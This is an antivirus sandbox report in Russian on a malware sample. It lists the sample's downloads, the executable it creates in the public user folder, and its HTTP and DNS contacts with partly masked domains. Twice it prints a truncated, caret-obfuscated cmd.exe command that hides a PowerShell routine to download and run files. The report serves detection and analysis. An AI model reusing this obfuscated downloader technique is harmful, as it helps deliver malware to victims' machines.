Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V^:O/C"^s^e^t Wn=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^a^er^b^;^z^G^u^$^ ^m^e^t^I^-^e^k^ovn^I^;)^z^Gu^$^ ^,^Wrr^$(^e^l^iFd^a^o^lnw^o^D.R^Y^W^$^{^yr^t^{)F^P^p^$^ n^i ^Wrr^$(^hc^a^e...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\793.exe
Сетевая активность
Подключается к
- 'fo#####nessandfun.com':80
- 'ae#.co.th':80
TCP
Запросы HTTP GET
- http://fo#####nessandfun.com/eSZgQcsj
- http://fo#####nessandfun.com/eSZgQcsj/
- http://www.ae#.co.th/web/wp-content/upgrade/worQFst
UDP
- DNS ASK mo####ingportal.com
- DNS ASK me#####.12weeksfor.com.br
- DNS ASK fo#####nessandfun.com
- DNS ASK to####-tancang.net
- DNS ASK ae#.co.th
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V^:O/C"^s^e^t Wn=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^a^er^b^;^z^G^u^$^ ^m^e^t^I^-^e^k^ovn^I^;)^z^Gu^$^ ^,^Wrr^$(^e^l^iFd^a^o^lnw^o^D.R^Y^W^$^{^yr^t^{)F^P^p^$^ n^i ^Wrr^$(^hc^a^e...' (со скрытым окном)
